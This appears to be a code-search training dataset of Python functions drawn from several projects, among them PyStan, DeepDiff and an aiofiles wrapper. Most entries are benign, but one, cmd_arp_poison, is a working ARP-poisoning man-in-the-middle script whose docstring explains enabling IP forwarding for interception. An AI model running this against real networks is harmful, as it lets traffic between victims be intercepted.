def _combine_msd_quan(msd, quan): """Combine msd and quantiles in chain summary Parameters ---------- msd : array of shape (num_params, 2, num_chains) mean and sd for chains cquan : array of shape (num_params, num_quan, num_chains) quantiles for chains Returns ------- msdquan : array of shape (num_params, 2 + num_quan, num_chains) """ dim1 = msd.shape n_par, _, n_chains = dim1 ll = [] for i in range(n_chains): a1 = msd[:, :, i] a2 = quan[:, :, i] ll.append(np.column_stack([a1, a2])) msdquan = np.dstack(ll) return msdquan
python
{ "resource": "" }
q29673
_summary_sim
train
def _summary_sim(sim, pars, probs): """Summarize chains together and separately REF: rstan/rstan/R/misc.R Parameters are unraveled in *column-major order*. Parameters ---------- sim : dict dict from from a stanfit fit object, i.e., fit['sim'] pars : Iterable of str parameter names probs : Iterable of probs desired quantiles Returns ------- summaries : OrderedDict of array This dictionary contains the following arrays indexed by the keys given below: - 'msd' : array of shape (num_params, 2) with mean and sd - 'sem' : array of length num_params with standard error for the mean - 'c_msd' : array of shape (num_params, 2, num_chains) - 'quan' : array of shape (num_params, num_quan) - 'c_quan' : array of shape (num_params, num_quan, num_chains) - 'ess' : array of shape (num_params, 1) - 'rhat' : array of shape (num_params, 1) Note ---- `_summary_sim` has the parameters in *column-major* order whereas `_summary` gives them in *row-major* order. (This follows RStan.) """ # NOTE: this follows RStan rather closely. Some of the calculations here probs_len = len(probs) n_chains = len(sim['samples']) # tidx is a dict with keys that are parameters and values that are their # indices using column-major ordering tidx = _pars_total_indexes(sim['pars_oi'], sim['dims_oi'], sim['fnames_oi'], pars) tidx_colm = [tidx[par] for par in pars] tidx_colm = list(itertools.chain(*tidx_colm)) # like R's unlist() tidx_rowm = [tidx[par+'_rowmajor'] for par in pars] tidx_rowm = list(itertools.chain(*tidx_rowm)) tidx_len = len(tidx_colm) lmsdq = [_get_par_summary(sim, i, probs) for i in tidx_colm] msd = np.row_stack([x['msd'] for x in lmsdq]) quan = np.row_stack([x['quan'] for x in lmsdq]) probs_str = tuple(["{:g}%".format(100*p) for p in probs]) msd.shape = (tidx_len, 2) quan.shape = (tidx_len, probs_len) c_msd = np.row_stack([x['c_msd'] for x in lmsdq]) c_quan = np.row_stack([x['c_quan'] for x in lmsdq]) c_msd.shape = (tidx_len, 2, n_chains) c_quan.shape = (tidx_len, probs_len, n_chains) sim_attr_args = sim.get('args', None) if sim_attr_args is None: cids = list(range(n_chains)) else: cids = [x['chain_id'] for x in sim_attr_args] c_msd_names = dict(parameters=np.asarray(sim['fnames_oi'])[tidx_colm], stats=("mean", "sd"), chains=tuple("chain:{}".format(cid) for cid in cids)) c_quan_names = dict(parameters=np.asarray(sim['fnames_oi'])[tidx_colm], stats=probs_str, chains=tuple("chain:{}".format(cid) for cid in cids)) ess_and_rhat = np.array([pystan.chains.ess_and_splitrhat(sim, n) for n in tidx_colm]) ess, rhat = [arr.ravel() for arr in np.hsplit(ess_and_rhat, 2)] return dict(msd=msd, c_msd=c_msd, c_msd_names=c_msd_names, quan=quan, c_quan=c_quan, c_quan_names=c_quan_names, sem=msd[:, 1] / np.sqrt(ess), ess=ess, rhat=rhat, row_major_idx=tidx_rowm, col_major_idx=tidx_colm)
python
{ "resource": "" }
q29674
_get_par_summary
train
def _get_par_summary(sim, n, probs): """Summarize chains merged and individually Parameters ---------- sim : dict from stanfit object n : int parameter index probs : iterable of int quantiles Returns ------- summary : dict Dictionary containing summaries """ # _get_samples gets chains for nth parameter ss = _get_samples(n, sim, inc_warmup=False) msdfun = lambda chain: (np.mean(chain), np.std(chain, ddof=1)) qfun = lambda chain: mquantiles(chain, probs) c_msd = np.array([msdfun(s) for s in ss]).flatten() c_quan = np.array([qfun(s) for s in ss]).flatten() ass = np.asarray(ss).flatten() msd = np.asarray(msdfun(ass)) quan = qfun(np.asarray(ass)) return dict(msd=msd, quan=quan, c_msd=c_msd, c_quan=c_quan)
python
{ "resource": "" }
q29675
_organize_inits
train
def _organize_inits(inits, pars, dims): """Obtain a list of initial values for each chain. The parameter 'lp__' will be removed from the chains. Parameters ---------- inits : list list of initial values for each chain. pars : list of str dims : list of list of int from (via cython conversion) vector[vector[uint]] dims Returns ------- inits : list of dict """ try: idx_of_lp = pars.index('lp__') del pars[idx_of_lp] del dims[idx_of_lp] except ValueError: pass starts = _calc_starts(dims) return [_par_vector2dict(init, pars, dims, starts) for init in inits]
python
{ "resource": "" }
q29676
_calc_starts
train
def _calc_starts(dims): """Calculate starting indexes Parameters ---------- dims : list of list of int from (via cython conversion) vector[vector[uint]] dims Examples -------- >>> _calc_starts([[8, 2], [5], [6, 2]]) [0, 16, 21] """ # NB: Python uses 0-indexing; R uses 1-indexing. l = len(dims) s = [np.prod(d) for d in dims] starts = np.cumsum([0] + s)[0:l].tolist() # coerce things into ints before returning return [int(i) for i in starts]
python
{ "resource": "" }
q29677
_par_vector2dict
train
def _par_vector2dict(v, pars, dims, starts=None): """Turn a vector of samples into an OrderedDict according to param dims. Parameters ---------- y : list of int or float pars : list of str parameter names dims : list of list of int list of dimensions of parameters Returns ------- d : dict Examples -------- >>> v = list(range(31)) >>> dims = [[5], [5, 5], []] >>> pars = ['mu', 'Phi', 'eta'] >>> _par_vector2dict(v, pars, dims) # doctest: +ELLIPSIS OrderedDict([('mu', array([0, 1, 2, 3, 4])), ('Phi', array([[ 5, ... """ if starts is None: starts = _calc_starts(dims) d = OrderedDict() for i in range(len(pars)): l = int(np.prod(dims[i])) start = starts[i] end = start + l y = np.asarray(v[start:end]) if len(dims[i]) > 1: y = y.reshape(dims[i], order='F') # 'F' = Fortran, column-major d[pars[i]] = y.squeeze() if y.shape == (1,) else y return d
python
{ "resource": "" }
q29678
_pars_total_indexes
train
def _pars_total_indexes(names, dims, fnames, pars): """Obtain all the indexes for parameters `pars` in the sequence of names. `names` references variables that are in column-major order Parameters ---------- names : sequence of str All the parameter names. dim : sequence of list of int Dimensions, in same order as `names`. fnames : sequence of str All the scalar parameter names pars : sequence of str The parameters of interest. It is assumed all elements in `pars` are in `names`. Returns ------- indexes : OrderedDict of list of int Dictionary uses parameter names as keys. Indexes are column-major order. For each parameter there is also a key `par`+'_rowmajor' that stores the row-major indexing. Note ---- Inside each parameter (vector or array), the sequence uses column-major ordering. For example, if we have parameters alpha and beta, having dimensions [2, 2] and [2, 3] respectively, the whole parameter sequence is alpha[0,0], alpha[1,0], alpha[0, 1], alpha[1, 1], beta[0, 0], beta[1, 0], beta[0, 1], beta[1, 1], beta[0, 2], beta[1, 2]. In short, like R matrix(..., bycol=TRUE). Example ------- >>> pars_oi = ['mu', 'tau', 'eta', 'theta', 'lp__'] >>> dims_oi = [[], [], [8], [8], []] >>> fnames_oi = ['mu', 'tau', 'eta[1]', 'eta[2]', 'eta[3]', 'eta[4]', ... 'eta[5]', 'eta[6]', 'eta[7]', 'eta[8]', 'theta[1]', 'theta[2]', ... 'theta[3]', 'theta[4]', 'theta[5]', 'theta[6]', 'theta[7]', ... 'theta[8]', 'lp__'] >>> pars = ['mu', 'tau', 'eta', 'theta', 'lp__'] >>> _pars_total_indexes(pars_oi, dims_oi, fnames_oi, pars) ... # doctest: +ELLIPSIS OrderedDict([('mu', (0,)), ('tau', (1,)), ('eta', (2, 3, ... """ starts = _calc_starts(dims) def par_total_indexes(par): # if `par` is a scalar, it will match one of `fnames` if par in fnames: p = fnames.index(par) idx = tuple([p]) return OrderedDict([(par, idx), (par+'_rowmajor', idx)]) else: p = names.index(par) idx = starts[p] + np.arange(np.prod(dims[p])) idx_rowmajor = starts[p] + _idx_col2rowm(dims[p]) return OrderedDict([(par, tuple(idx)), (par+'_rowmajor', tuple(idx_rowmajor))]) indexes = OrderedDict() for par in pars: indexes.update(par_total_indexes(par)) return indexes
python
{ "resource": "" }
q29679
_idx_col2rowm
train
def _idx_col2rowm(d): """Generate indexes to change from col-major to row-major ordering""" if 0 == len(d): return 1 if 1 == len(d): return np.arange(d[0]) # order='F' indicates column-major ordering idx = np.array(np.arange(np.prod(d))).reshape(d, order='F').T return idx.flatten(order='F')
python
{ "resource": "" }
q29680
_get_samples
train
def _get_samples(n, sim, inc_warmup=True): # NOTE: this is in stanfit-class.R in RStan (rather than misc.R) """Get chains for `n`th parameter. Parameters ---------- n : int sim : dict A dictionary tied to a StanFit4Model instance. Returns ------- chains : list of array Each chain is an element in the list. """ return pystan._misc.get_samples(n, sim, inc_warmup)
python
{ "resource": "" }
q29681
_writable_sample_file
train
def _writable_sample_file(file, warn=True, wfun=None): """Check to see if file is writable, if not use temporary file""" if wfun is None: wfun = lambda x, y: '"{}" is not writable; use "{}" instead'.format(x, y) dir = os.path.dirname(file) dir = os.getcwd() if dir == '' else dir if os.access(dir, os.W_OK): return file else: dir2 = tempfile.mkdtemp() if warn: logger.warning(wfun(dir, dir2)) return os.path.join(dir2, os.path.basename(file))
python
{ "resource": "" }
q29682
stan_rdump
train
def stan_rdump(data, filename): """ Dump a dictionary with model data into a file using the R dump format that Stan supports. Parameters ---------- data : dict filename : str """ for name in data: if not is_legal_stan_vname(name): raise ValueError("Variable name {} is not allowed in Stan".format(name)) with open(filename, 'w') as f: f.write(_dict_to_rdump(data))
python
{ "resource": "" }
q29683
_rdump_value_to_numpy
train
def _rdump_value_to_numpy(s): """ Convert a R dump formatted value to Numpy equivalent For example, "c(1, 2)" becomes ``array([1, 2])`` Only supports a few R data structures. Will not work with European decimal format. """ if "structure" in s: vector_str, shape_str = re.findall(r'c\([^\)]+\)', s) shape = [int(d) for d in shape_str[2:-1].split(',')] if '.' in vector_str: arr = np.array([float(v) for v in vector_str[2:-1].split(',')]) else: arr = np.array([int(v) for v in vector_str[2:-1].split(',')]) # 'F' = Fortran, column-major arr = arr.reshape(shape, order='F') elif "c(" in s: if '.' in s: arr = np.array([float(v) for v in s[2:-1].split(',')], order='F') else: arr = np.array([int(v) for v in s[2:-1].split(',')], order='F') else: arr = np.array(float(s) if '.' in s else int(s)) return arr
python
{ "resource": "" }
q29684
read_rdump
train
def read_rdump(filename): """ Read data formatted using the R dump format Parameters ---------- filename: str Returns ------- data : OrderedDict """ contents = open(filename).read().strip() names = [name.strip() for name in re.findall(r'^(\w+) <-', contents, re.MULTILINE)] values = [value.strip() for value in re.split('\w+ +<-', contents) if value] if len(values) != len(names): raise ValueError("Unable to read file. Unable to pair variable name with value.") d = OrderedDict() for name, value in zip(names, values): d[name.strip()] = _rdump_value_to_numpy(value.strip()) return d
python
{ "resource": "" }
q29685
load_module
train
def load_module(module_name, module_path): """Load the module named `module_name` from `module_path` independently of the Python version.""" if sys.version_info >= (3,0): import pyximport pyximport.install() sys.path.append(module_path) return __import__(module_name) else: import imp module_info = imp.find_module(module_name, [module_path]) return imp.load_module(module_name, *module_info)
python
{ "resource": "" }
q29686
_open
train
def _open(file, mode='r', buffering=-1, encoding=None, errors=None, newline=None, closefd=True, opener=None, *, loop=None, executor=None): """Open an asyncio file.""" if loop is None: loop = asyncio.get_event_loop() cb = partial(sync_open, file, mode=mode, buffering=buffering, encoding=encoding, errors=errors, newline=newline, closefd=closefd, opener=opener) f = yield from loop.run_in_executor(executor, cb) return wrap(f, loop=loop, executor=executor)
python
{ "resource": "" }
q29687
DeepDiff._get_view_results
train
def _get_view_results(self, view): """ Get the results based on the view """ if view == TREE_VIEW: result = self.tree else: result = TextResult(tree_results=self.tree) result.cleanup() # clean up text-style result dictionary return result
python
{ "resource": "" }
q29688
DeepDiff.__diff_dict
train
def __diff_dict(self, level, parents_ids=frozenset({}), print_as_attribute=False, override=False, override_t1=None, override_t2=None): """Difference of 2 dictionaries""" if override: # for special stuff like custom objects and named tuples we receive preprocessed t1 and t2 # but must not spoil the chain (=level) with it t1 = override_t1 t2 = override_t2 else: t1 = level.t1 t2 = level.t2 if print_as_attribute: item_added_key = "attribute_added" item_removed_key = "attribute_removed" rel_class = AttributeRelationship else: item_added_key = "dictionary_item_added" item_removed_key = "dictionary_item_removed" rel_class = DictRelationship t1_keys = set(t1.keys()) t2_keys = set(t2.keys()) if self.ignore_string_type_changes or self.ignore_numeric_type_changes: t1_clean_to_keys = self.__get_clean_to_keys_mapping(keys=t1_keys, level=level) t2_clean_to_keys = self.__get_clean_to_keys_mapping(keys=t2_keys, level=level) t1_keys = set(t1_clean_to_keys.keys()) t2_keys = set(t2_clean_to_keys.keys()) else: t1_clean_to_keys = t2_clean_to_keys = None t_keys_intersect = t2_keys.intersection(t1_keys) t_keys_added = t2_keys - t_keys_intersect t_keys_removed = t1_keys - t_keys_intersect for key in t_keys_added: key = t2_clean_to_keys[key] if t2_clean_to_keys else key change_level = level.branch_deeper( notpresent, t2[key], child_relationship_class=rel_class, child_relationship_param=key) self.__report_result(item_added_key, change_level) for key in t_keys_removed: key = t1_clean_to_keys[key] if t1_clean_to_keys else key change_level = level.branch_deeper( t1[key], notpresent, child_relationship_class=rel_class, child_relationship_param=key) self.__report_result(item_removed_key, change_level) for key in t_keys_intersect: # key present in both dicts - need to compare values key1 = t1_clean_to_keys[key] if t1_clean_to_keys else key key2 = t2_clean_to_keys[key] if t2_clean_to_keys else key item_id = id(t1[key1]) if parents_ids and item_id in parents_ids: continue parents_ids_added = add_to_frozen_set(parents_ids, item_id) # Go one level deeper next_level = level.branch_deeper( t1[key1], t2[key2], child_relationship_class=rel_class, child_relationship_param=key) self.__diff(next_level, parents_ids_added)
python
{ "resource": "" }
q29689
DeepDiff.__diff_set
train
def __diff_set(self, level): """Difference of sets""" t1_hashtable = self.__create_hashtable(level.t1, level) t2_hashtable = self.__create_hashtable(level.t2, level) t1_hashes = set(t1_hashtable.keys()) t2_hashes = set(t2_hashtable.keys()) hashes_added = t2_hashes - t1_hashes hashes_removed = t1_hashes - t2_hashes items_added = [t2_hashtable[i].item for i in hashes_added] items_removed = [t1_hashtable[i].item for i in hashes_removed] for item in items_added: change_level = level.branch_deeper( notpresent, item, child_relationship_class=SetRelationship) self.__report_result('set_item_added', change_level) for item in items_removed: change_level = level.branch_deeper( item, notpresent, child_relationship_class=SetRelationship) self.__report_result('set_item_removed', change_level)
python
{ "resource": "" }
q29690
DeepDiff.__diff_iterable
train
def __diff_iterable(self, level, parents_ids=frozenset({})): """Difference of iterables""" # We're handling both subscriptable and non-subscriptable iterables. Which one is it? subscriptable = self.__iterables_subscriptable(level.t1, level.t2) if subscriptable: child_relationship_class = SubscriptableIterableRelationship else: child_relationship_class = NonSubscriptableIterableRelationship for i, (x, y) in enumerate( zip_longest( level.t1, level.t2, fillvalue=ListItemRemovedOrAdded)): if y is ListItemRemovedOrAdded: # item removed completely change_level = level.branch_deeper( x, notpresent, child_relationship_class=child_relationship_class, child_relationship_param=i) self.__report_result('iterable_item_removed', change_level) elif x is ListItemRemovedOrAdded: # new item added change_level = level.branch_deeper( notpresent, y, child_relationship_class=child_relationship_class, child_relationship_param=i) self.__report_result('iterable_item_added', change_level) else: # check if item value has changed item_id = id(x) if parents_ids and item_id in parents_ids: continue parents_ids_added = add_to_frozen_set(parents_ids, item_id) # Go one level deeper next_level = level.branch_deeper( x, y, child_relationship_class=child_relationship_class, child_relationship_param=i) self.__diff(next_level, parents_ids_added)
python
{ "resource": "" }
q29691
DeepDiff.__diff_iterable_with_deephash
train
def __diff_iterable_with_deephash(self, level): """Diff of unhashable iterables. Only used when ignoring the order.""" t1_hashtable = self.__create_hashtable(level.t1, level) t2_hashtable = self.__create_hashtable(level.t2, level) t1_hashes = set(t1_hashtable.keys()) t2_hashes = set(t2_hashtable.keys()) hashes_added = t2_hashes - t1_hashes hashes_removed = t1_hashes - t2_hashes if self.report_repetition: for hash_value in hashes_added: for i in t2_hashtable[hash_value].indexes: change_level = level.branch_deeper( notpresent, t2_hashtable[hash_value].item, child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie! child_relationship_param=i ) # TODO: what is this value exactly? self.__report_result('iterable_item_added', change_level) for hash_value in hashes_removed: for i in t1_hashtable[hash_value].indexes: change_level = level.branch_deeper( t1_hashtable[hash_value].item, notpresent, child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie! child_relationship_param=i) self.__report_result('iterable_item_removed', change_level) items_intersect = t2_hashes.intersection(t1_hashes) for hash_value in items_intersect: t1_indexes = t1_hashtable[hash_value].indexes t2_indexes = t2_hashtable[hash_value].indexes t1_indexes_len = len(t1_indexes) t2_indexes_len = len(t2_indexes) if t1_indexes_len != t2_indexes_len: # this is a repetition change! # create "change" entry, keep current level untouched to handle further changes repetition_change_level = level.branch_deeper( t1_hashtable[hash_value].item, t2_hashtable[hash_value].item, # nb: those are equal! child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie! child_relationship_param=t1_hashtable[hash_value] .indexes[0]) repetition_change_level.additional['repetition'] = RemapDict( old_repeat=t1_indexes_len, new_repeat=t2_indexes_len, old_indexes=t1_indexes, new_indexes=t2_indexes) self.__report_result('repetition_change', repetition_change_level) else: for hash_value in hashes_added: change_level = level.branch_deeper( notpresent, t2_hashtable[hash_value].item, child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie! child_relationship_param=t2_hashtable[hash_value].indexes[ 0]) # TODO: what is this value exactly? self.__report_result('iterable_item_added', change_level) for hash_value in hashes_removed: change_level = level.branch_deeper( t1_hashtable[hash_value].item, notpresent, child_relationship_class=SubscriptableIterableRelationship, # TODO: that might be a lie! child_relationship_param=t1_hashtable[hash_value].indexes[ 0]) self.__report_result('iterable_item_removed', change_level)
python
{ "resource": "" }
q29692
DeepDiff.to_dict
train
def to_dict(self): """ Dump dictionary of the text view. It does not matter which view you are currently in. It will give you the dictionary of the text view. """ if self.view == TREE_VIEW: result = dict(self._get_view_results(view=TEXT_VIEW)) else: result = dict(self) return result
python
{ "resource": "" }
q29693
short_repr
train
def short_repr(item, max_length=15): """Short representation of item if it is too long""" item = repr(item) if len(item) > max_length: item = '{}...{}'.format(item[:max_length - 3], item[-1]) return item
python
{ "resource": "" }
q29694
number_to_string
train
def number_to_string(number, significant_digits, number_format_notation="f"): """ Convert numbers to string considering significant digits. """ try: using = number_formatting[number_format_notation] except KeyError: raise ValueError("number_format_notation got invalid value of {}. The valid values are 'f' and 'e'".format(number_format_notation)) from None if isinstance(number, Decimal): tup = number.as_tuple() with localcontext() as ctx: ctx.prec = len(tup.digits) + tup.exponent + significant_digits number = number.quantize(Decimal('0.' + '0' * significant_digits)) result = (using % significant_digits).format(number) # Special case for 0: "-0.00" should compare equal to "0.00" if set(result) <= ZERO_DECIMAL_CHARACTERS: result = "0.00" # https://bugs.python.org/issue36622 if number_format_notation == 'e' and isinstance(number, float): result = result.replace('+0', '+') return result
python
{ "resource": "" }
q29695
prepare_string_for_hashing
train
def prepare_string_for_hashing(obj, ignore_string_type_changes=False, ignore_string_case=False): """ Clean type conversions """ original_type = obj.__class__.__name__ if isinstance(obj, bytes): obj = obj.decode('utf-8') if not ignore_string_type_changes: obj = KEY_TO_VAL_STR.format(original_type, obj) if ignore_string_case: obj = obj.lower() return obj
python
{ "resource": "" }
q29696
DeepSearch.__search_iterable
train
def __search_iterable(self, obj, item, parent="root", parents_ids=frozenset({})): """Search iterables except dictionaries, sets and strings.""" for i, thing in enumerate(obj): new_parent = "%s[%s]" % (parent, i) if self.__skip_this(thing, parent=new_parent): continue if self.case_sensitive or not isinstance(thing, strings): thing_cased = thing else: thing_cased = thing.lower() if thing_cased == item: self.__report( report_key='matched_values', key=new_parent, value=thing) else: item_id = id(thing) if parents_ids and item_id in parents_ids: continue parents_ids_added = add_to_frozen_set(parents_ids, item_id) self.__search(thing, item, "%s[%s]" % (parent, i), parents_ids_added)
python
{ "resource": "" }
q29697
DeepSearch.__search
train
def __search(self, obj, item, parent="root", parents_ids=frozenset({})): """The main search method""" if self.__skip_this(item, parent): return elif isinstance(obj, strings) and isinstance(item, strings): self.__search_str(obj, item, parent) elif isinstance(obj, strings) and isinstance(item, numbers): return elif isinstance(obj, numbers): self.__search_numbers(obj, item, parent) elif isinstance(obj, MutableMapping): self.__search_dict(obj, item, parent, parents_ids) elif isinstance(obj, tuple): self.__search_tuple(obj, item, parent, parents_ids) elif isinstance(obj, (set, frozenset)): if self.warning_num < 10: logger.warning( "Set item detected in the path." "'set' objects do NOT support indexing. But DeepSearch will still report a path." ) self.warning_num += 1 self.__search_iterable(obj, item, parent, parents_ids) elif isinstance(obj, Iterable): self.__search_iterable(obj, item, parent, parents_ids) else: self.__search_obj(obj, item, parent, parents_ids)
python
{ "resource": "" }
q29698
cmd_arp_poison
train
def cmd_arp_poison(victim1, victim2, iface, verbose): """Send ARP 'is-at' packets to each victim, poisoning their ARP tables for send the traffic to your system. Note: If you want a full working Man In The Middle attack, you need to enable the packet forwarding on your operating system to act like a router. You can do that using: # echo 1 > /proc/sys/net/ipv4/ip_forward Example: \b # habu.arpoison 192.168.0.1 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70 Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77 ... """ conf.verb = False if iface: conf.iface = iface mac1 = getmacbyip(victim1) mac2 = getmacbyip(victim2) pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1) pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2) try: while 1: sendp(pkt1) sendp(pkt2) if verbose: pkt1.show2() pkt2.show2() else: print(pkt1.summary()) print(pkt2.summary()) time.sleep(1) except KeyboardInterrupt: pass
python
{ "resource": "" }
q29699
get_headers
train
def get_headers(server): """Retrieve all HTTP headers""" try: response = requests.head( server, allow_redirects=False, verify=False, timeout=5) except requests.exceptions.ConnectionError: return False return dict(response.headers)
python
{ "resource": "" }